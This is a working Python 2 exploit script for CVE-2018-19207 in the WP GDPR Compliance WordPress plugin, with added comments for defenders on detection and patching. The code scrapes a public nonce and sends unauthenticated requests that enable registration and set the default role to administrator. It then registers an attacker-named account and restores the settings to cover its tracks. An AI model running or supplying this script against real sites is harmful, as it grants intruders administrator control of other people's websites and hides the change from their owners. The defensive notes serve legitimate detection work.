import requests
import re

#######################################
#      CHANGE THESE VARIABLES         #
#######################################
# Proof-of-concept for CVE-2018-19207 (WP GDPR Compliance plugin <= 1.4.2, per the
# banner below). Flow, as visible in this script: scrape the plugin's "ajaxSecurity"
# nonce from the unauthenticated front page, send unauthenticated POSTs to
# admin-ajax.php that flip the WordPress options `users_can_register` and
# `default_role`, register a user through the normal wp-login.php form, then flip
# both options back.
#
# This is Python 2 code (statement-form `print`, `r.content` treated as str).
#
# Defender notes (grounded in the requests this script makes):
#  - The nonce is read from public HTML, so it does not authenticate anything; the
#    fix is updating the plugin beyond 1.4.2.
#  - Detection: unauthenticated POSTs to wp-admin/admin-ajax.php with
#    action=wpgdprc_process_action whose data contains "save_setting", and
#    changes to `users_can_register` / `default_role` in wp_options.
#  - Because the last step restores both options, checking current settings after
#    the fact shows nothing; audit for unexpected administrator accounts and
#    option-change history instead.
baseurl = "https://example.com"
username = "hacker"
email = "[email protected]" #valid email is needed for account creation


#######################################
#  NO CHANGES NEEDED AFTER THIS PART  #
#######################################

# `is not` against a string literal is an identity test, not equality; Python 3.8+
# emits a SyntaxWarning for this. Do not rely on it for the trailing-slash check.
if baseurl[-1] is not "/":
    baseurl += "/"
# Both endpoints are core WordPress URLs; no plugin-specific path is requested.
ajaxurl = baseurl + "wp-admin/admin-ajax.php"
registerurl = baseurl + "wp-login.php?action=register"

print "WP GDPR Compliance Plugin (<=1.4.2) Exploit"
print "             CVE-2018-19207"
print "###########################################\n\r"
print "Trying to exploit instance on {}\n\r\n\r".format(baseurl)

print "Retrieving ajaxSecurity nonce..."

# The nonce is taken from a JSON fragment embedded in the front page; a plain GET
# with no session is enough, which is why the nonce provides no authorization.
nonce_pattern = re.compile(r'\"ajaxSecurity\":\"(.*?)\"\}')
r = requests.get(baseurl)

match = re.findall(nonce_pattern,r.content)
if match:
    ajaxSecurity = match[0]
    print "ajaxSecurity: {}\n\r".format(ajaxSecurity)
else:
    print "Was not able to find any ajaxSecurity nonce... Are you sure the plugin is installed?"
    # Note: exits with status 0 even though the run failed.
    exit(0)

# Each POST below carries only form data — no cookies or session — so every
# option change is performed unauthenticated. Response status is never checked.
print "Enabling user registration..."
params = {'action':'wpgdprc_process_action', 'data':'{"type": "save_setting", "append": false, "option": "users_can_register", "value": "1"}', 'security':ajaxSecurity}
r = requests.post(ajaxurl,data=params)
print "Setting default role to administrator..."
params = {'action':'wpgdprc_process_action', 'data':'{"type": "save_setting", "append": false, "option": "default_role", "value": "administrator"}', 'security':ajaxSecurity}
r = requests.post(ajaxurl,data=params)

# Standard WordPress self-registration form; the script expects the new account to
# receive whatever `default_role` was set to above ("Registrieren" is the German
# submit-button label and is sent as-is).
print "\n\rRegistering user '{}' with email '{}'...\n\r".format(username, email)
params = {'user_login':username, 'user_email':email, 'wp-submit':"Registrieren"}
r = requests.post(registerurl,data=params)
print r.content

# Cleanup: both options are restored, so a later look at the settings page will not
# reveal the change — see the defender notes at the top of this script.
print "Disabling user registration..."
params = {'action':'wpgdprc_process_action', 'data':'{"type": "save_setting", "append": false, "option": "users_can_register", "value": "0"}', 'security':ajaxSecurity}
r = requests.post(ajaxurl,data=params)
print "Setting default role back to subscriber..."
params = {'action':'wpgdprc_process_action', 'data':'{"type": "save_setting", "append": false, "option": "default_role", "value": "subscriber"}', 'security':ajaxSecurity}
r = requests.post(ajaxurl,data=params)

# Success is assumed; nothing above verifies that the account actually exists.
print "\n\r\n\rAccount {} created. Check you mail at {} for setting password.".format(username, email)